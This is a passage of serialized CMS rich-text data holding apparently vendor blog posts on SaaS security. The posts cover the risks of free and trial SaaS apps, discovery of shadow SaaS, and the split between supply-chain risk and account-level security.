above:",[],{},{"nodeType":312,"data":299136,"content":299139},{"target":299137},{"sys":299138},{"id":280644,"type":317,"linkType":318},[],{"nodeType":178,"data":299141,"content":299142},{},[299143],{"nodeType":173,"value":299144,"marks":299145,"data":299146},"Notice how all those “Sign up now” buttons have morphed into “Get a demo” buttons? This is the “old-school” way of procuring software. You work with sales and get a live demo with the sales rep, rather than signing up and trying it for yourself. Then you do still have to do your due diligence and work directly with the vendor to vet whether they’ll responsibly protect your corporate and/or customer data, that they’re SOC2 compliant, and so on.",[],{},{"nodeType":178,"data":299148,"content":299149},{},[299150],{"nodeType":173,"value":299151,"marks":299152,"data":299153},"Unfortunately, few security companies are making products as easy to set up and use as new tools for marketing, sales, finance, development, engineering design, legal, HR, and basically every other sector.",[],{},{"nodeType":178,"data":299155,"content":299156},{},[299157],{"nodeType":173,"value":299158,"marks":299159,"data":299162},"This leads to a misconception that self-adopted apps are rare and don’t contain sensitive data. ",[299160,299161],{"type":370},{"type":1646},{},{"nodeType":178,"data":299164,"content":299165},{},[299166],{"nodeType":173,"value":37,"marks":299167,"data":299170},[299168,299169],{"type":370},{"type":1646},{},{"nodeType":169,"data":299172,"content":299173},{},[299174],{"nodeType":173,"value":299175,"marks":299176,"data":299177},"Free trials interact with real, live corporate data",[],{},{"nodeType":178,"data":299179,"content":299180},{},[299181],{"nodeType":173,"value":299182,"marks":299183,"data":299184},"It’s not just the paid, fully-adopted apps that introduce third-party, supply-chain and SaaS application security risks to your organization. Even those free trials before an app is officially “adopted” can pose a significant security risk. ",[],{},{"nodeType":178,"data":299186,"content":299187},{},[299188],{"nodeType":173,"value":299189,"marks":299190,"data":299191},"For PLG to work, users need to experience meaningful value during that initial experience. To do that, users/your employees almost always need to connect the app to your live environment where it interacts with real data. ",[],{},{"nodeType":169,"data":299193,"content":299194},{},[299195],{"nodeType":173,"value":299196,"marks":299197,"data":299198},"Security and IT only see a few of the apps employees are testing and signing up for",[],{},{"nodeType":178,"data":299200,"content":299201},{},[299202],{"nodeType":173,"value":299203,"marks":299204,"data":299205},"To make matters worse, only a small subset of those apps ever get submitted to finance or any official app-onboarding process. Typically, this happens when an employee outgrows the free or trial tier and needs to upgrade to a paid account. ",[],{},{"nodeType":178,"data":299207,"content":299208},{},[299209,299215],{"nodeType":173,"value":299210,"marks":299211,"data":299214},"The freemium and trial versions of apps are unlikely to ever be presented to IT and security.",[299212,299213],{"type":1646},{"type":370},{},{"nodeType":173,"value":10557,"marks":299216,"data":299217},[],{},{"nodeType":178,"data":299219,"content":299220},{},[299221],{"nodeType":173,"value":299222,"marks":299223,"data":299224},"Most agree that only about 2-5% of folks on freemium/free tiers become paying customers. With conversions from free to paid happening only at a very very low rate, it’s very likely that a lot of your employees are using a lot of free tier apps for at least some significant timeframe.",[],{},{"nodeType":178,"data":299226,"content":299227},{},[299228],{"nodeType":173,"value":299229,"marks":299230,"data":299231},"As mentioned earlier, real live data is often still input into those free apps. So, if you’re relying on finance records to tell you which apps employees are using, you’re going to miss all those free apps, which may never reach finance. And those free apps present just as much risk as the paid apps, more if you consider that you have no visibility into the majority of them. ",[],{},{"nodeType":169,"data":299233,"content":299234},{},[299235],{"nodeType":173,"value":299236,"marks":299237,"data":299238},"Losing direct visibility into SaaS apps means Security is getting in too late",[],{},{"nodeType":178,"data":299240,"content":299241},{},[299242,299246,299251,299255,299260],{"nodeType":173,"value":299243,"marks":299244,"data":299245},"Though security teams have lost ",[],{},{"nodeType":173,"value":299247,"marks":299248,"data":299250},"direct visibility",[299249],{"type":1646},{},{"nodeType":173,"value":299252,"marks":299253,"data":299254},", they’ve not lost ",[],{},{"nodeType":173,"value":299256,"marks":299257,"data":299259},"complete visibility.",[299258],{"type":1646},{},{"nodeType":173,"value":299261,"marks":299262,"data":299263}," Many are finding out about at least a fraction of these apps, though things like:",[],{},{"nodeType":250,"data":299265,"content":299266},{},[299267,299277,299287],{"nodeType":254,"data":299268,"content":299269},{},[299270],{"nodeType":178,"data":299271,"content":299272},{},[299273],{"nodeType":173,"value":299274,"marks":299275,"data":299276},"Pulling expense reports once employees need to move from a free to paid tier of an app",[],{},{"nodeType":254,"data":299278,"content":299279},{},[299280],{"nodeType":178,"data":299281,"content":299282},{},[299283],{"nodeType":173,"value":299284,"marks":299285,"data":299286},"Scanning employee email inboxes for key phrases like, “Thanks for signing up for [app]”",[],{},{"nodeType":254,"data":299288,"content":299289},{},[299290],{"nodeType":178,"data":299291,"content":299292},{},[299293],{"nodeType":173,"value":299294,"marks":299295,"data":299296},"And, unfortunately, when something has already gone wrong and they’re asked to respond to an incident on a SaaS platform",[],{},{"nodeType":178,"data":299298,"content":299299},{},[299300,299303,299309],{"nodeType":173,"value":281972,"marks":299301,"data":299302},[],{},{"nodeType":173,"value":299304,"marks":299305,"data":299308},"security is getting visibility too late to be of much value",[299306,299307],{"type":1646},{"type":370},{},{"nodeType":173,"value":299310,"marks":299311,"data":299312},". As I mentioned earlier, once a team has been using an app (even on a free tier) for a year, it’s a huge challenge for Security to convince them to move to a more secure app or to consolidate apps when they find multiple teams using very similar apps. ",[],{},{"nodeType":178,"data":299314,"content":299315},{},[299316,299321],{"nodeType":173,"value":299317,"marks":299318,"data":299320},"This intervention needs to happen very early - long before finance is involved - in order to make a positive impact.",[299319],{"type":1646},{},{"nodeType":173,"value":10557,"marks":299322,"data":299323},[],{},{"nodeType":178,"data":299325,"content":299326},{},[299327],{"nodeType":173,"value":299328,"marks":299329,"data":299330},"Incident Response is necessary, of course, when a SaaS account is breached, but cannot recover the lost data after a successful attack. ",[],{},{"nodeType":178,"data":299332,"content":299333},{},[299334],{"nodeType":173,"value":299335,"marks":299336,"data":299337},"All of this obviously poses a problem from an IT and security standpoint. Don’t sound the alarms yet, though, there’s a way to regain some control over your corporate data without having to play bad cop with your entire company.",[],{},{"nodeType":231,"data":299339,"content":299340},{},[],{"nodeType":169,"data":299342,"content":299343},{},[299344],{"nodeType":173,"value":299345,"marks":299346,"data":299347},"First steps to reclaiming control",[],{},{"nodeType":178,"data":299349,"content":299350},{},[299351],{"nodeType":173,"value":299352,"marks":299353,"data":299354},"This is a very high-level take on where to start when it comes to SaaS sprawl and security and building out a strong SaaS and cloud security program. But, it’s a start!",[],{},{"nodeType":235,"data":299356,"content":299357},{},[299358],{"nodeType":173,"value":299359,"marks":299360,"data":299361},"1. Shift your perspective ",[],{},{"nodeType":178,"data":299363,"content":299364},{},[299365],{"nodeType":173,"value":299366,"marks":299367,"data":299368},"To regain visibility and control, you need to work with employees, rather than focusing on blocking them from their favorite tools.",[],{},{"nodeType":178,"data":299370,"content":299371},{},[299372],{"nodeType":173,"value":299373,"marks":299374,"data":299375},"You can rein this in, but you must shift from the old way of thinking - you can no longer be the “Department of No” and have to shift to becoming the “Department of Yes, Unless….”",[],{},{"nodeType":235,"data":299377,"content":299378},{},[299379],{"nodeType":173,"value":299380,"marks":299381,"data":299382},"2. Get in early",[],{},{"nodeType":178,"data":299384,"content":299385},{},[299386],{"nodeType":173,"value":299387,"marks":299388,"data":299389},"Do yourself a favor and buy yourself time to do due diligence on the multiple SaaS applications employees sign up for on their own. ",[],{},{"nodeType":178,"data":299391,"content":299392},{},[299393],{"nodeType":173,"value":299394,"marks":299395,"data":299396},"Getting involved before an employee or team are fully reliant on an app is the best way to make a positive impact on your SaaS security posture.",[],{},{"nodeType":178,"data":299398,"content":299399},{},[299400],{"nodeType":173,"value":299401,"marks":299402,"data":299403},"To do this, you need…",[],{},{"nodeType":235,"data":299405,"content":299406},{},[299407],{"nodeType":173,"value":299408,"marks":299409,"data":299410},"3. Get real-time visibility into the SaaS and cloud apps your employees are signing up for",[],{},{"nodeType":178,"data":299412,"content":299413},{},[299414],{"nodeType":173,"value":299415,"marks":299416,"data":299417},"This can be a noisy mess, but it doesn’t have to be. Look for solutions with options that work with your existing workflow. Tools that send a ChatOps message to security whenever an employee signs up for a new app is a great start.",[],{},{"nodeType":178,"data":299419,"content":299420},{},[299421],{"nodeType":173,"value":299422,"marks":299423,"data":299424},"To cut through the noise, rely on a SaaS security solution that also provides security-relevant information that tells you when you should dig into an app further or when an app only poses minimal risk and can be ignored.",[],{},{"nodeType":235,"data":299426,"content":299427},{},[299428],{"nodeType":173,"value":299429,"marks":299430,"data":299431},"4. Find and fix account security issues at the same time",[],{},{"nodeType":178,"data":299433,"content":299434},{},[299435],{"nodeType":173,"value":299436,"marks":299437,"data":299438},"We suggest you focus on account security issues since this is where the attacks are happening - at the account level. ",[],{},{"nodeType":178,"data":299440,"content":299441},{},[299442],{"nodeType":173,"value":299443,"marks":299444,"data":299445},"Getting SaaS visibility is crucial, but it’s not useful if the data leads to false positives. Tracking down cloud apps that aren’t actually in use is a massive waste of your time.",[],{},{"nodeType":178,"data":299447,"content":299448},{},[299449,299453,299457],{"nodeType":173,"value":299450,"marks":299451,"data":299452},"To get the most accurate visibility into shadow SaaS, consider a browser extension. Why, yes, we ",[],{},{"nodeType":173,"value":287551,"marks":299454,"data":299456},[299455],{"type":1646},{},{"nodeType":173,"value":299458,"marks":299459,"data":299460},"biased! But we built our product on top of a combo of API data and browser data because that’s where employees are accessing and signing up for their SaaS and cloud apps. ",[],{},{"nodeType":178,"data":299462,"content":299463},{},[299464,299468,299476],{"nodeType":173,"value":299465,"marks":299466,"data":299467},"We dig into this SaaS discovery data source topic in much more detail ",[],{},{"nodeType":186,"data":299469,"content":299471},{"uri":299470},"https://pushsecurity.com/blog/want-to-discover-the-full-extent-of-your-saas-sprawl-embrace-browser/",[299472],{"nodeType":173,"value":28052,"marks":299473,"data":299475},[299474],{"type":194},{},{"nodeType":173,"value":299477,"marks":299478,"data":299479},", so that’s worth a read when you’re ready to start prioritizing SaaS security and evaluating solutions. ",[],{},{"nodeType":235,"data":299481,"content":299482},{},[299483],{"nodeType":173,"value":299484,"marks":299485,"data":299486},"5. Work with employees to reduce the burden on your security team ",[],{},{"nodeType":178,"data":299488,"content":299489},{},[299490],{"nodeType":173,"value":299491,"marks":299492,"data":299493},"No, you don’t want employees making security decisions, but you will need to find a way to help them secure the SaaS accounts they have at a user-level.",[],{},{"nodeType":250,"data":299495,"content":299496},{},[299497,299507],{"nodeType":254,"data":299498,"content":299499},{},[299500],{"nodeType":178,"data":299501,"content":299502},{},[299503],{"nodeType":173,"value":299504,"marks":299505,"data":299506},"To keep up with the scale of SaaS adoption and SaaS sprawl in your attack surface, which will continue to grow weekly, you’ll need to automate the information-gathering part of the process. ",[],{},{"nodeType":254,"data":299508,"content":299509},{},[299510],{"nodeType":178,"data":299511,"content":299512},{},[299513],{"nodeType":173,"value":299514,"marks":299515,"data":299516},"When possible, equip employees to self-remediate issues and complete tasks (like signing up for MFA in the app) that your team would otherwise have to do. ",[],{},{"nodeType":178,"data":299518,"content":299519},{},[299520],{"nodeType":173,"value":37,"marks":299521,"data":299522},[],{},"Free and trial SaaS applications are even riskier than paid apps","Free and trial SaaS accounts are often invisible to security teams and still interact with real, live corporate data.","2023-07-11T00:00:00.000Z","free-and-trial-saas-applications-are-even-riskier-than-paid-apps",{"items":299528},[299529,299531],{"sys":299530,"name":26133},{"id":26132},{"sys":299532,"name":274157},{"id":274156},{"items":299534},[299535],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":299536},{"url":273636},{"__typename":1528,"sys":299538,"content":299539,"title":297416,"synopsis":297417,"hashTags":118,"publishedDate":297418,"slug":297419,"tagsCollection":300067,"authorsCollection":300073},{"id":283466},{"json":299540},{"nodeType":165,"data":299541,"content":299542},{},[299543,299553,299559,299565,299571,299577,299600,299606,299621,299627,299643,299649,299654,299776,299782,299788,299794,299840,299846,299861,299867,299873,299879,299885,299891,299897,299903,299909,299915,299921,299927,299933,299953,299959,299965,299971,299977,299983,299989,299995,300001,300007,300013,300019,300025,300031,300037,300043,300046,300052,300055,300061],{"nodeType":178,"data":299544,"content":299545},{},[299546,299549],{"nodeType":173,"value":296810,"marks":299547,"data":299548},[],{},{"nodeType":173,"value":296814,"marks":299550,"data":299552},[299551],{"type":1646},{},{"nodeType":178,"data":299554,"content":299555},{},[299556],{"nodeType":173,"value":296822,"marks":299557,"data":299558},[],{},{"nodeType":178,"data":299560,"content":299561},{},[299562],{"nodeType":173,"value":296829,"marks":299563,"data":299564},[],{},{"nodeType":178,"data":299566,"content":299567},{},[299568],{"nodeType":173,"value":296836,"marks":299569,"data":299570},[],{},{"nodeType":169,"data":299572,"content":299573},{},[299574],{"nodeType":173,"value":296843,"marks":299575,"data":299576},[],{},{"nodeType":178,"data":299578,"content":299579},{},[299580,299583,299587,299590,299597],{"nodeType":173,"value":296850,"marks":299581,"data":299582},[],{},{"nodeType":173,"value":296854,"marks":299584,"data":299586},[299585],{"type":194},{},{"nodeType":173,"value":296859,"marks":299588,"data":299589},[],{},{"nodeType":186,"data":299591,"content":299592},{"uri":296864},[299593],{"nodeType":173,"value":5387,"marks":299594,"data":299596},[299595],{"type":194},{},{"nodeType":173,"value":296871,"marks":299598,"data":299599},[],{},{"nodeType":178,"data":299601,"content":299602},{},[299603],{"nodeType":173,"value":296878,"marks":299604,"data":299605},[],{},{"nodeType":178,"data":299607,"content":299608},{},[299609,299612,299618],{"nodeType":173,"value":296885,"marks":299610,"data":299611},[],{},{"nodeType":186,"data":299613,"content":299614},{"uri":296890},[299615],{"nodeType":173,"value":296893,"marks":299616,"data":299617},[],{},{"nodeType":173,"value":296897,"marks":299619,"data":299620},[],{},{"nodeType":169,"data":299622,"content":299623},{},[299624],{"nodeType":173,"value":296904,"marks":299625,"data":299626},[],{},{"nodeType":178,"data":299628,"content":299629},{},[299630,299633,299640],{"nodeType":173,"value":296911,"marks":299631,"data":299632},[],{},{"nodeType":186,"data":299634,"content":299635},{"uri":296916},[299636],{"nodeType":173,"value":24477,"marks":299637,"data":299639},[299638],{"type":194},{},{"nodeType":173,"value":296923,"marks":299641,"data":299642},[],{},{"nodeType":178,"data":299644,"content":299645},{},[299646],{"nodeType":173,"value":296930,"marks":299647,"data":299648},[],{},{"nodeType":312,"data":299650,"content":299653},{"target":299651},{"sys":299652},{"id":296937,"type":317,"linkType":318},[],{"nodeType":246189,"data":299655,"content":299656},{},[299657,299709,299722,299735,299748],{"nodeType":254,"data":299658,"content":299659},{},[299660,299670],{"nodeType":178,"data":299661,"content":299662},{},[299663,299667],{"nodeType":173,"value":296949,"marks":299664,"data":299666},[299665],{"type":370},{},{"nodeType":173,"value":296954,"marks":299668,"data":299669},[],{},{"nodeType":246189,"data":299671,"content":299672},{},[299673,299682,299691,299700],{"nodeType":254,"data":299674,"content":299675},{},[299676],{"nodeType":178,"data":299677,"content":299678},{},[299679],{"nodeType":173,"value":296967,"marks":299680,"data":299681},[],{},{"nodeType":254,"data":299683,"content":299684},{},[299685],{"nodeType":178,"data":299686,"content":299687},{},[299688],{"nodeType":173,"value":296977,"marks":299689,"data":299690},[],{},{"nodeType":254,"data":299692,"content":299693},{},[299694],{"nodeType":178,"data":299695,"content":299696},{},[299697],{"nodeType":173,"value":296987,"marks":299698,"data":299699},[],{},{"nodeType":254,"data":299701,"content":299702},{},[299703],{"nodeType":178,"data":299704,"content":299705},{},[299706],{"nodeType":173,"value":296997,"marks":299707,"data":299708},[],{},{"nodeType":254,"data":299710,"content":299711},{},[299712],{"nodeType":178,"data":299713,"content":299714},{},[299715,299719],{"nodeType":173,"value":297007,"marks":299716,"data":299718},[299717],{"type":370},{},{"nodeType":173,"value":297012,"marks":299720,"data":299721},[],{},{"nodeType":254,"data":299723,"content":299724},{},[299725],{"nodeType":178,"data":299726,"content":299727},{},[299728,299732],{"nodeType":173,"value":297022,"marks":299729,"data":299731},[299730],{"type":370},{},{"nodeType":173,"value":297027,"marks":299733,"data":299734},[],{},{"nodeType":254,"data":299736,"content":299737},{},[299738],{"nodeType":178,"data":299739,"content":299740},{},[299741,299745],{"nodeType":173,"value":297037,"marks":299742,"data":299744},[299743],{"type":370},{},{"nodeType":173,"value":297042,"marks":299746,"data":299747},[],{},{"nodeType":254,"data":299749,"content":299750},{},[299751,299764],{"nodeType":178,"data":299752,"content":299753},{},[299754,299757,299761],{"nodeType":173,"value":297052,"marks":299755,"data":299756},[],{},{"nodeType":173,"value":297056,"marks":299758,"data":299760},[299759],{"type":370},{},{"nodeType":173,"value":297061,"marks":299762,"data":299763},[],{},{"nodeType":246189,"data":299765,"content":299766},{},[299767],{"nodeType":254,"data":299768,"content":299769},{},[299770],{"nodeType":178,"data":299771,"content":299772},{},[299773],{"nodeType":173,"value":297074,"marks":299774,"data":299775},[],{},{"nodeType":178,"data":299777,"content":299778},{},[299779],{"nodeType":173,"value":297081,"marks":299780,"data":299781},[],{},{"nodeType":169,"data":299783,"content":299784},{},[299785],{"nodeType":173,"value":297088,"marks":299786,"data":299787},[],{},{"nodeType":178,"data":299789,"content":299790},{},[299791],{"nodeType":173,"value":297095,"marks":299792,"data":299793},[],{},{"nodeType":250,"data":299795,"content":299796},{},[299797,299806,299815,299831],{"nodeType":254,"data":299798,"content":299799},{},[299800],{"nodeType":178,"data":299801,"content":299802},{},[299803],{"nodeType":173,"value":297108,"marks":299804,"data":299805},[],{},{"nodeType":254,"data":299807,"content":299808},{},[299809],{"nodeType":178,"data":299810,"content":299811},{},[299812],{"nodeType":173,"value":297118,"marks":299813,"data":299814},[],{},{"nodeType":254,"data":299816,"content":299817},{},[299818],{"nodeType":178,"data":299819,"content":299820},{},[299821,299824,299828],{"nodeType":173,"value":297128,"marks":299822,"data":299823},[],{},{"nodeType":173,"value":297132,"marks":299825,"data":299827},[299826],{"type":1646},{},{"nodeType":173,"value":297137,"marks":299829,"data":299830},[],{},{"nodeType":254,"data":299832,"content":299833},{},[299834],{"nodeType":178,"data":299835,"content":299836},{},[299837],{"nodeType":173,"value":297147,"marks":299838,"data":299839},[],{},{"nodeType":178,"data":299841,"content":299842},{},[299843],{"nodeType":173,"value":297154,"marks":299844,"data":299845},[],{},{"nodeType":178,"data":299847,"content":299848},{},[299849,299852,299858],{"nodeType":173,"value":297161,"marks":299850,"data":299851},[],{},{"nodeType":186,"data":299853,"content":299854},{"uri":297166},[299855],{"nodeType":173,"value":297169,"marks":299856,"data":299857},[],{},{"nodeType":173,"value":297173,"marks":299859,"data":299860},[],{},{"nodeType":178,"data":299862,"content":299863},{},[299864],{"nodeType":173,"value":297180,"marks":299865,"data":299866},[],{},{"nodeType":169,"data":299868,"content":299869},{},[299870],{"nodeType":173,"value":297187,"marks":299871,"data":299872},[],{},{"nodeType":178,"data":299874,"content":299875},{},[299876],{"nodeType":173,"value":297194,"marks":299877,"data":299878},[],{},{"nodeType":178,"data":299880,"content":299881},{},[299882],{"nodeType":173,"value":297201,"marks":299883,"data":299884},[],{},{"nodeType":178,"data":299886,"content":299887},{},[299888],{"nodeType":173,"value":297208,"marks":299889,"data":299890},[],{},{"nodeType":178,"data":299892,"content":299893},{},[299894],{"nodeType":173,"value":297215,"marks":299895,"data":299896},[],{},{"nodeType":169,"data":299898,"content":299899},{},[299900],{"nodeType":173,"value":297222,"marks":299901,"data":299902},[],{},{"nodeType":178,"data":299904,"content":299905},{},[299906],{"nodeType":173,"value":297229,"marks":299907,"data":299908},[],{},{"nodeType":178,"data":299910,"content":299911},{},[299912],{"nodeType":173,"value":297236,"marks":299913,"data":299914},[],{},{"nodeType":235,"data":299916,"content":299917},{},[299918],{"nodeType":173,"value":297243,"marks":299919,"data":299920},[],{},{"nodeType":178,"data":299922,"content":299923},{},[299924],{"nodeType":173,"value":297250,"marks":299925,"data":299926},[],{},{"nodeType":178,"data":299928,"content":299929},{},[299930],{"nodeType":173,"value":297257,"marks":299931,"data":299932},[],{},{"nodeType":178,"data":299934,"content":299935},{},[299936,299939,299946,299950],{"nodeType":173,"value":297264,"marks":299937,"data":299938},[],{},{"nodeType":186,"data":299940,"content":299941},{"uri":297269},[299942],{"nodeType":173,"value":297272,"marks":299943,"data":299945},[299944],{"type":194},{},{"nodeType":173,"value":3107,"marks":299947,"data":299949},[299948],{"type":194},{},{"nodeType":173,"value":297281,"marks":299951,"data":299952},[],{},{"nodeType":178,"data":299954,"content":299955},{},[299956],{"nodeType":173,"value":297288,"marks":299957,"data":299958},[],{},{"nodeType":235,"data":299960,"content":299961},{},[299962],{"nodeType":173,"value":297295,"marks":299963,"data":299964},[],{},{"nodeType":178,"data":299966,"content":299967},{},[299968],{"nodeType":173,"value":297302,"marks":299969,"data":299970},[],{},{"nodeType":178,"data":299972,"content":299973},{},[299974],{"nodeType":173,"value":297309,"marks":299975,"data":299976},[],{},{"nodeType":178,"data":299978,"content":299979},{},[299980],{"nodeType":173,"value":297316,"marks":299981,"data":299982},[],{},{"nodeType":178,"data":299984,"content":299985},{},[299986],{"nodeType":173,"value":297323,"marks":299987,"data":299988},[],{},{"nodeType":178,"data":299990,"content":299991},{},[299992],{"nodeType":173,"value":297330,"marks":299993,"data":299994},[],{},{"nodeType":235,"data":299996,"content":299997},{},[299998],{"nodeType":173,"value":297337,"marks":299999,"data":300000},[],{},{"nodeType":178,"data":300002,"content":300003},{},[300004],{"nodeType":173,"value":297344,"marks":300005,"data":300006},[],{},{"nodeType":178,"data":300008,"content":300009},{},[300010],{"nodeType":173,"value":297351,"marks":300011,"data":300012},[],{},{"nodeType":235,"data":300014,"content":300015},{},[300016],{"nodeType":173,"value":297358,"marks":300017,"data":300018},[],{},{"nodeType":178,"data":300020,"content":300021},{},[300022],{"nodeType":173,"value":297365,"marks":300023,"data":300024},[],{},{"nodeType":178,"data":300026,"content":300027},{},[300028],{"nodeType":173,"value":297372,"marks":300029,"data":300030},[],{},{"nodeType":169,"data":300032,"content":300033},{},[300034],{"nodeType":173,"value":297379,"marks":300035,"data":300036},[],{},{"nodeType":178,"data":300038,"content":300039},{},[300040],{"nodeType":173,"value":297386,"marks":300041,"data":300042},[],{},{"nodeType":231,"data":300044,"content":300045},{},[],{"nodeType":178,"data":300047,"content":300048},{},[300049],{"nodeType":173,"value":297396,"marks":300050,"data":300051},[],{},{"nodeType":231,"data":300053,"content":300054},{},[],{"nodeType":178,"data":300056,"content":300057},{},[300058],{"nodeType":173,"value":297406,"marks":300059,"data":300060},[],{},{"nodeType":178,"data":300062,"content":300063},{},[300064],{"nodeType":173,"value":297413,"marks":300065,"data":300066},[],{},{"items":300068},[300069,300071],{"sys":300070,"name":274157},{"id":274156},{"sys":300072,"name":26133},{"id":26132},{"items":300074},[300075],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":300076},{"url":13981},{"items":300078},[300079],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":300080},{"url":273636},{"json":300082,"links":300780},{"nodeType":165,"data":300083,"content":300084},{},[300085,300092,300099,300106,300113,300120,300126,300133,300156,300163,300170,300177,300184,300191,300198,300219,300226,300233,300251,300256,300263,300270,300275,300282,300289,300296,300303,300310,300341,300348,300354,300361,300368,300387,300394,300401,300416,300423,300438,300445,300452,300459,300466,300473,300608,300615,300622,300629,300662,300669,300676,300683,300697,300702,300709,300716,300759,300766,300773],{"nodeType":178,"data":300086,"content":300087},{},[300088],{"nodeType":173,"value":300089,"marks":300090,"data":300091},"SaaS security is a common phrase, but what does it mean? There are several categories of security products that do bits of “SaaS security,” but the phrase means different things to everyone, and there’s a lot of jargon to demystify in this space.",[],{},{"nodeType":178,"data":300093,"content":300094},{},[300095],{"nodeType":173,"value":300096,"marks":300097,"data":300098},"A quick Google search for “SaaS security” pulls in all types of security solutions and platforms, including those under these categories: cloud access security brokers (CASB), SaaS security posture management (SSPM), cloud security posture management (CSPM), and a few others.",[],{},{"nodeType":178,"data":300100,"content":300101},{},[300102],{"nodeType":173,"value":300103,"marks":300104,"data":300105},"When you’re on the hook to secure SaaS use in your company, it can be hard to even know where to start and where to focus. We hope this article helps you get some clarity about where you should focus and how to manage the risk in a sustainable way with your limited resources.",[],{},{"nodeType":178,"data":300107,"content":300108},{},[300109],{"nodeType":173,"value":300110,"marks":300111,"data":300112},"Let’s start with a quick, high-level definition.",[],{},{"nodeType":169,"data":300114,"content":300115},{},[300116],{"nodeType":173,"value":300117,"marks":300118,"data":300119},"What is SaaS security?",[],{},{"nodeType":178,"data":300121,"content":300122},{},[300123],{"nodeType":173,"value":298941,"marks":300124,"data":300125},[],{},{"nodeType":178,"data":300127,"content":300128},{},[300129],{"nodeType":173,"value":300130,"marks":300131,"data":300132},"When it comes to managing the risk SaaS security introduces, people are really talking about two things: ",[],{},{"nodeType":246189,"data":300134,"content":300135},{},[300136,300146],{"nodeType":254,"data":300137,"content":300138},{},[300139],{"nodeType":178,"data":300140,"content":300141},{},[300142],{"nodeType":173,"value":300143,"marks":300144,"data":300145},"Managing supply chain risk - Do you trust the vendors of the applications you’re using?",[],{},{"nodeType":254,"data":300147,"content":300148},{},[300149],{"nodeType":178,"data":300150,"content":300151},{},[300152],{"nodeType":173,"value":300153,"marks":300154,"data":300155},"SaaS account security and access controls - Are you using those applications securely?",[],{},{"nodeType":169,"data":300157,"content":300158},{},[300159],{"nodeType":173,"value":300160,"marks":300161,"data":300162},"Where should I focus my efforts?",[],{},{"nodeType":178,"data":300164,"content":300165},{},[300166],{"nodeType":173,"value":300167,"marks":300168,"data":300169},"We hear about the supply chain side of SaaS security more often than the account security aspect, likely because supply chain attacks have a much wider blast radius and are therefore the attacks that are getting detected and disclosed to the press. ",[],{},{"nodeType":178,"data":300171,"content":300172},{},[300173],{"nodeType":173,"value":300174,"marks":300175,"data":300176},"These are the far-reaching attacks that might start with a platform that many organizations use for business (Salesforce, for example). If that SaaS platform is compromised, every company’s data is compromised, including your own. These things aren’t something you can directly prevent from happening. ",[],{},{"nodeType":178,"data":300178,"content":300179},{},[300180],{"nodeType":173,"value":300181,"marks":300182,"data":300183},"SaaS account security, however, is something you have control of and you can lock down.",[],{},{"nodeType":235,"data":300185,"content":300186},{},[300187],{"nodeType":173,"value":300188,"marks":300189,"data":300190},"Focus on SaaS security at the account level, but don’t ignore supply chain risk",[],{},{"nodeType":178,"data":300192,"content":300193},{},[300194],{"nodeType":173,"value":300195,"marks":300196,"data":300197},"As a security leader, you need to deal with both halves of SaaS security. On the supply chain side, you need to investigate whether you trust the SaaS providers themselves and the security measures they use to look after your data. The SaaS vendor is best suited to manage the risk of their own app itself, but you do need to do due diligence on the supplier to ensure they’re doing enough to comply with your organization’s risk tolerance level. ",[],{},{"nodeType":178,"data":300199,"content":300200},{},[300201,300205,300215],{"nodeType":173,"value":300202,"marks":300203,"data":300204},"The bit you have direct control over, however, is the account security aspect of SaaS security. That’s a great area to focus on when it comes to SaaS security. You can enforce strong access controls and security basics like making sure employees use multi-factor authentication (MFA) and strong, unique passwords - or, better yet, ",[],{},{"nodeType":1698,"data":300206,"content":300209},{"target":300207},{"sys":300208},{"id":273995,"type":317,"linkType":318},[300210],{"nodeType":173,"value":300211,"marks":300212,"data":300214},"social logins",[300213],{"type":194},{},{"nodeType":173,"value":300216,"marks":300217,"data":300218}," - to access their SaaS applications.",[],{},{"nodeType":178,"data":300220,"content":300221},{},[300222],{"nodeType":173,"value":300223,"marks":300224,"data":300225},"Let’s break down how a SaaS security program could work in your organization. Keep in mind, this may be closely tied to your cloud security program, but they’re two unique areas to focus on if you’re a SaaS-native or hybrid company that’s moving away from centralized infrastructure to the cloud and SaaS applications.",[],{},{"nodeType":169,"data":300227,"content":300228},{},[300229],{"nodeType":173,"value":300230,"marks":300231,"data":300232},"How do I build a SaaS security program in my organization?",[],{},{"nodeType":178,"data":300234,"content":300235},{},[300236,300240,300247],{"nodeType":173,"value":300237,"marks":300238,"data":300239},"\nThe National Cyber Security Centre produced a ",[],{},{"nodeType":186,"data":300241,"content":300242},{"uri":280989},[300243],{"nodeType":173,"value":273729,"marks":300244,"data":300246},[300245],{"type":194},{},{"nodeType":173,"value":300248,"marks":300249,"data":300250}," that does a great job of demonstrating the split between the SaaS provider’s responsibility when it comes to securing their app and the sensitive data put into it by their customers and the responsibility of the “customer” (you).  ",[],{},{"nodeType":312,"data":300252,"content":300255},{"target":300253},{"sys":300254},{"id":283612,"type":317,"linkType":318},[],{"nodeType":178,"data":300257,"content":300258},{},[300259],{"nodeType":173,"value":300260,"marks":300261,"data":300262},"We’ve highlighted in purple the areas we’re focused on in this article. Let’s save on-prem, IaaS and PaaS for another article.",[],{},{"nodeType":178,"data":300264,"content":300265},{},[300266],{"nodeType":173,"value":300267,"marks":300268,"data":300269},"\nThis bears repeating - What the model above shows is that you as the customer are responsible for security at the SaaS account level and you must also configure the application securely. When it comes to SaaS applications, however, your configuration options are usually very basic, especially compared to larger cloud platforms.  ",[],{},{"nodeType":312,"data":300271,"content":300274},{"target":300272},{"sys":300273},{"id":281248,"type":317,"linkType":318},[],{"nodeType":178,"data":300276,"content":300277},{},[300278],{"nodeType":173,"value":300279,"marks":300280,"data":300281},"A successful SaaS security program must address both these questions. ",[],{},{"nodeType":178,"data":300283,"content":300284},{},[300285],{"nodeType":173,"value":300286,"marks":300287,"data":300288},"We can’t spend all our time doing risk assessments and due diligence exercises on our supply chain while dropping the ball on account security. ",[],{},{"nodeType":178,"data":300290,"content":300291},{},[300292],{"nodeType":173,"value":300293,"marks":300294,"data":300295},"Similarly, we can’t just focus on making sure all accounts have MFA in place when the vendor is leaving the back door open.",[],{},{"nodeType":235,"data":300297,"content":300298},{},[300299],{"nodeType":173,"value":300300,"marks":300301,"data":300302},"Make the biggest impact by securing SaaS accounts and identities ",[],{},{"nodeType":178,"data":300304,"content":300305},{},[300306],{"nodeType":173,"value":300307,"marks":300308,"data":300309},"For the vast majority of SaaS applications in the organization, your responsibility will 